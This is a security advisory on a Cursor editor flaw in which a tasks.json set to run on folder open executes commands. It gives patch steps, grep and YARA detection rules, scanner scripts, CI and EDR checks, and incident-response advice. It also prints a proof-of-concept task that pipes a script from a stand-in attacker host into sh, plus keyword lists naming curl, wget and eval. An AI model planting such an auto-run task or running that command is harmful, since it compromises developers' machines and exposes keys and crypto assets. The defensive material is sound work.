Cursor AI Vulnerability — Risk of Cryptocurrency Theft

Quick Action Plan
- What happened: A critical vulnerability has been discovered in the Cursor AI editor, allowing remote code execution (RCE) when opening a malicious project folder.
- Who is affected: Users of Cursor versions prior to 0.34.4. Web3 developers are at particular risk.
- Urgent actions for developers:
  - Update Cursor to version 0.34.4 or newer.
  - Enable Workspace Trust in security settings.
  - Scan projects for suspicious `tasks.json` files.
  - Rotate keys and tokens if you have opened untrusted projects.
Introduction
In January 2024, the SlowMist cybersecurity team reported a critical vulnerability in Cursor—a popular AI-powered code editor. The issue allowed an attacker to execute arbitrary code on a developer's machine through the standard "Open Folder" function. This vulnerability turned a productivity tool into an attack vector aimed at stealing API keys, data, and cryptocurrency assets.
Timeline and Technical Details
The vulnerability arose from an automatic task execution feature inherited from VS Code, which was enabled by default in older versions of Cursor without sufficient precautions.
- January 8, 2024 — SlowMist Report: Experts demonstrated a PoC attack, showing how a command embedded in the `.vscode/tasks.json` file is executed upon opening a project.
  Source: SlowMist Report.
- January 9, 2024 — Patch Released: Anysphere, the company behind Cursor, released version 0.34.4, which enables the Workspace Trust feature by default to prevent automatic code execution.
  Source: Release 0.34.4 Changelog.
At the time of publication, this specific tasks.json vulnerability had not been assigned a unique CVE identifier. A search of the NVD and MITRE databases did not reveal a corresponding entry. The issue is inherited from the VS Code architecture and was resolved by implementing the Workspace Trust feature rather than fixing a specific bug in the Cursor code itself.
Affected Versions
| Status | Versions | Patch Release Date | Release Link |
|---|---|---|---|
| Vulnerable | All versions prior to 0.34.4 | — | — |
| Secure | 0.34.4 and newer | January 9, 2024 | GitHub Releases |
Technical Attack Vector and Proof-of-Concept (PoC)
The attack exploits the automatic task execution mechanism configured in the .vscode/tasks.json file within a project. When such a folder is opened in a vulnerable version of Cursor, the editor automatically executes the specified commands without user confirmation.
DANGER: DO NOT RUN IN A PRODUCTION ENVIRONMENT
The example below is a demonstration of the attack vector. Never run commands from untrusted sources. Even simply opening a project folder in a vulnerable environment can lead to automatic execution of malicious code and full system compromise.
Example of a malicious .vscode/tasks.json file:
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install dependencies",
      "type": "shell",
      "command": "curl -s http://attacker-example[.]com/payload.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```
In this scenario, the curl command downloads and executes a malicious script from the attacker's server the moment the project folder is opened.
Action Plan: Protection and Response
Step 1: Immediate Actions (Within the Hour)
- Update Cursor AI: Immediately install the latest version (0.34.4+) from the official cursor.sh website or the releases page.
- Verify Release Integrity: Before installation, ensure the downloaded file has not been tampered with.
  - Linux/macOS: `sha256sum -c sha256sums.txt --ignore-missing`
  - Windows (PowerShell): `(Get-FileHash 'Cursor.Setup.exe').Hash.ToLower() -eq ((Get-Content 'sha256sums.txt' | Select-String 'Cursor.Setup.exe').ToString().Split(' ')[0])`
- Enable Workspace Trust: This feature, inherited from VS Code, prevents automatic code execution from untrusted projects. Cursor has a similar setting.
  - GUI: Go to `Settings → Security → Workspace Trust` and ensure the option is enabled.
  - settings.json: Set the flag `"security.workspace.trust.enabled": true`. You can read more about this feature in the VS Code documentation.
- Audit Projects: Use the scripts from the "Automated Verification" section to scan local repositories for suspicious `tasks.json` files.
- Rotate Keys: If you have opened suspicious projects, immediately change all API keys (AWS, Google Cloud, OpenAI), passwords, SSH keys, and access tokens.
Step 2: Long-Term Protection
- Isolate Environments: Use a separate, isolated environment (virtual machine, Docker container) for working with code from unverified sources.
- Principle of Least Privilege: Run development tools as a user with limited permissions.
Indicators of Compromise (IOCs)
File Indicators
- Paths: Look for `tasks.json` files with suspicious content in `.vscode/` folders within your projects.
- Searching with grep:

  ```bash
  # Find tasks.json files containing the "folderOpen" autostart option
  # Replace /path/to/projects with your project path
  find /path/to/projects -type f -name "tasks.json" -exec grep -l '"runOn": "folderOpen"' {} +

  # Search for suspicious commands (curl|sh, wget, eval, base64)
  find /path/to/projects -type f -name "tasks.json" -exec grep -H -E 'sh -c|eval\(|curl|wget|base64\s-d' {} +
  ```
- YARA Rule for `tasks.json`:

  ```yara
  rule Suspicious_Cursor_Tasks_Json {
      meta:
          description = "Detects tasks.json configured to run on folderOpen with suspicious commands"
          author = "Threat Research Team"
          date = "2024-01-15"
      strings:
          // Matched against the file's content, not its name
          $file = "tasks.json" nocase
          $run_on = /"runOn"\s*:\s*"folderOpen"/
          $cmd_curl = /"command"\s*:\s*".*(curl|wget).*|.*(sh|bash|zsh)\s*"/
          $cmd_eval = /"command"\s*:\s*".*eval\s*\(.*\).*/
      condition:
          // Fast check for '{"ve' at offset 0 (only files with no whitespace after the brace).
          // uint32be() is used because uint32() reads little-endian.
          uint32be(0) == 0x7B227665 and
          $file and $run_on and 1 of ($cmd*)
  }
  ```
Network Indicators
- Suspicious Domains: DNS queries to domains on free hosting or dynamic DNS (`*.ddns.net`, `*.no-ip.com`, `*.xyz`, `*.top`).
- Traffic Analysis: Look for outgoing connections from `node`, `python`, `sh`, or `bash` processes launched as child processes of Cursor.
  - Linux/macOS: `sudo ss -tupn | grep -E 'node|python|sh'` (without `-l`, so that established connections are listed rather than only listening sockets)
  - Windows (PowerShell): `Get-NetTCPConnection -State Established | Where-Object { ($proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue) -and ($proc.ProcessName -in 'node','python','sh') }`
Automated Verification of Working Directories
Use these scripts to bulk-scan projects for malicious tasks.json files.
Instructions:
- Save the script to a file (e.g., `scan.sh` or `scan.ps1`).
- Run it, specifying the path to the root folder of your projects.
- Important: If the script finds suspicious files, do not open those projects. Analyze them in an isolated environment.
Script for Linux/macOS (Bash):
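```bash
#!/bin/bash
# Directory to scan; defaults to the current directory.
SEARCH_DIR="${1:-.}"
echo "Scanning for potentially malicious tasks.json in '$SEARCH_DIR'..."
# IFS= keeps leading and trailing whitespace in file names intact.
find "$SEARCH_DIR" -type f -name "tasks.json" | while IFS= read -r file; do
    # Flag files that auto-run on folder open and also contain a download or exec pattern.
    if grep -q '"runOn": "folderOpen"' "$file" && grep -q -E 'curl|wget|bash -c|sh -c|eval|base64' "$file"; then
        echo "!!! SUSPICIOUS FILE DETECTED: $file"
    fi
done
echo "Scan complete."
```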
Script for Windows (PowerShell):
```powershell
param (
    [Parameter(Mandatory=$true)]
    [string]$Path
)
Write-Host "Scanning for potentially malicious tasks.json in '$Path'..."
Get-ChildItem -Path $Path -Recurse -Filter "tasks.json" -File | ForEach-Object {
    $content = Get-Content $_.FullName -Raw
    # Flag files that auto-run on folder open and also contain a download or exec pattern.
    if ($content -match '"runOn": "folderOpen"' -and $content -match '(curl|wget|bash -c|sh -c|eval|base64)') {
        Write-Host "!!! SUSPICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
    }
}
Write-Host "Scan complete."
```
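The scripts above match the literal text `"runOn": "folderOpen"`, so a file written as `"runOn":"folderOpen"` or spread across lines passes unnoticed. The following structure-aware audit is an added example, not part of the original scripts or of Cursor; it assumes the VS Code `tasks.json` layout shown earlier, and the function names and sample are constructed for illustration.

```python
import json
import re
from pathlib import Path

# One pass: string literals are kept; // and /* */ comments and trailing commas
# are dropped (tasks.json is JSONC, which json.loads would otherwise reject).
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)

def commands(task):
    # Top-level command plus any per-OS override (windows/linux/osx).
    found = []
    for scope in [task] + [task.get(k) for k in ("windows", "linux", "osx")]:
        if isinstance(scope, dict) and "command" in scope:
            cmd = scope["command"]
            cmd = cmd.get("value", "") if isinstance(cmd, dict) else cmd
            args = scope.get("args")
            parts = [cmd] + (args if isinstance(args, list) else [])
            found.append(" ".join(str(p) for p in parts))
    return found or ["<no command field>"]

def auto_run_tasks(text):
    """Return (label, command) pairs for tasks that run when the folder opens."""
    keep = lambda m: m.group(0) if m.group(0).startswith('"') else ""
    try:
        doc = json.loads(_JSONC.sub(keep, text))
    except ValueError:  # not parseable even as JSONC: surface for manual review
        return [("<unparseable>", "review manually")]
    tasks = doc.get("tasks") if isinstance(doc, dict) else None
    hits = []
    for task in tasks if isinstance(tasks, list) else []:
        opts = task.get("runOptions") if isinstance(task, dict) else None
        if isinstance(opts, dict) and opts.get("runOn") == "folderOpen":
            label = str(task.get("label", "<unlabelled>"))
            hits.extend((label, cmd) for cmd in commands(task))
    return hits

def scan_tree(root):
    """Map every .vscode/tasks.json under root to its auto-run tasks."""
    files = [p for p in Path(root).rglob("tasks.json") if p.parent.name == ".vscode"]
    scans = {str(p): auto_run_tasks(p.read_text(encoding="utf-8-sig", errors="replace")) for p in files}
    return {path: hits for path, hits in scans.items() if hits}

# Constructed sample: a comment, a trailing comma and compact "runOn" spacing.
SAMPLE = '''{ // constructed
  "tasks": [{"label": "install dependencies", "type": "shell",
    "command": "curl -s http://attacker-example[.]com/payload.sh | sh",
    "runOptions": {"runOn":"folderOpen"}},]}'''
```

Every task reported by `scan_tree` runs without a click in an editor that lacks Workspace Trust, so review the listed command even when it contains none of the keywords the grep patterns look for.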
Recommendations for Security and DevOps Teams
- CI/CD Integration: Add a step to the CI pipeline that scans the repository for `tasks.json` files containing `runOn: folderOpen`.

  Example for GitHub Actions:

  ```yaml
  - name: Scan for dangerous tasks.json
    run: |
      # grep -l lists matching files; the step fails only when at least one is listed
      # (a bare "find ... -exec grep -q" also succeeds when no tasks.json exists at all).
      if find . -type f -name "tasks.json" -exec grep -l '"runOn": "folderOpen"' {} + | grep -q .; then
        echo "::error::Dangerous 'runOn: folderOpen' found in tasks.json!"
        exit 1
      fi
  ```
- Pre-commit Hooks: Implement local pre-commit hooks to perform a similar check before committing.
- Repository Policies: Configure `CODEOWNERS` in GitHub so that changes to `.vscode/` require mandatory review from the security team.
- EDR/IDS Rules: Create rules to monitor and alert when the editor process spawns child processes like `curl`, `wget`, or `sh -c`.
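A sketch of the EDR rule logic, as an added example that is not taken from any EDR product or from the original article. A task command usually runs through a shell, so `curl` is often a grandchild of the editor; the rule therefore walks the whole ancestry instead of checking only the direct parent. The event tuple layout, pids and the helper process name are constructed assumptions.

```python
import re

# Constructed process-creation events (pid, ppid, image, command line); the
# helper process name and pids are illustrative, not taken from a real host.
EVENTS = [
    (100, 1, "Cursor", "Cursor"),
    (210, 100, "Cursor Helper", "Cursor Helper"),
    (305, 210, "sh", "sh -c curl -s http://attacker-example[.]com/payload.sh | sh"),
    (306, 305, "curl", "curl -s http://attacker-example[.]com/payload.sh"),
    (400, 1, "bash", "bash -c make test"),
    (500, 100, "git", "git status"),
]

EDITOR = re.compile(r"cursor(\.exe)?", re.I)    # assumed editor image name
FETCHER = re.compile(r"(curl|wget)(\.exe)?", re.I)
SHELL_C = re.compile(r"\b(sh|bash|zsh)\s+-c\b")

def ancestry(pid, procs):
    """Image names from pid up to the root; the seen-set guards against pid loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid, image = procs[pid]   # step to the parent
        chain.append(image)
    return chain

def editor_spawn_alerts(events):
    """Flag curl/wget or `sh -c` processes that have the editor anywhere above them."""
    procs = {pid: (ppid, image) for pid, ppid, image, _ in events}
    alerts = []
    for pid, ppid, image, cmd in events:
        if FETCHER.fullmatch(image) or SHELL_C.search(cmd):
            chain = ancestry(ppid, procs)
            if any(EDITOR.fullmatch(name) for name in chain):
                alerts.append((pid, image, " <- ".join(chain)))
    return alerts
```

On the constructed events this flags pids 305 and 306; the `bash -c` started outside the editor (pid 400) and the editor's own `git` child (pid 500) are not reported.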
Forensics and Incident Response
- Isolate the Machine: Immediately disconnect it from the network. Do not power it off, so that data in RAM is preserved for analysis.
- Collect Artifacts (for Professionals):
  - RAM Image: Use `FTK Imager` or `Belkasoft RAM Capturer`.
  - System Logs: `Event Viewer` (Windows), `/var/log/` (Linux), `~/Library/Logs/` (macOS).
  - Cursor Logs: `%APPDATA%\Cursor\logs` (Windows), `~/.config/Cursor/logs` (Linux), `~/Library/Application Support/Cursor/logs` (macOS).
  - Processes and Connections: Save the output of `ps aux` and `sudo ss -tulpn` (Linux/macOS) or `Get-Process` and `Get-NetTCPConnection` (PowerShell).
- Contact Specialists: In a corporate environment, contact your Incident Response (IR/CSIRT) team.
What to Do with a Compromised Crypto Wallet
WARNING: Do not act hastily. Attackers use automated scripts (sweeper bots) that instantly steal any assets arriving at a compromised address (e.g., ETH for gas fees).
- Do not fund the compromised wallet. Any funds sent to pay for transaction fees will be immediately stolen.
- Create a new wallet on a guaranteed clean device. The ideal option is a hardware wallet (Ledger, Trezor).
- Plan asset recovery. To withdraw tokens, you will need to outpace the bot. Use private transaction services like Flashbots to send the transaction directly to a miner/validator, bypassing the public mempool. This is a complex procedure that requires expert assistance.
- Notify exchanges and analytics services. If funds were transferred to a centralized exchange, contact their support immediately, providing the TxID and attacker addresses.
- Never use the compromised wallet again. Abandon it forever.
Conclusion
The Cursor incident is a critical reminder that the convenience of AI tools should not come at the cost of security. The responsibility for data protection lies with every developer. Keep your software updated, enable protective mechanisms like Workspace Trust, and treat any downloaded code as potentially dangerous.
If you discover a vulnerability, report it responsibly to the developers at security@anysphere.co or via SECURITY.md in the project repository.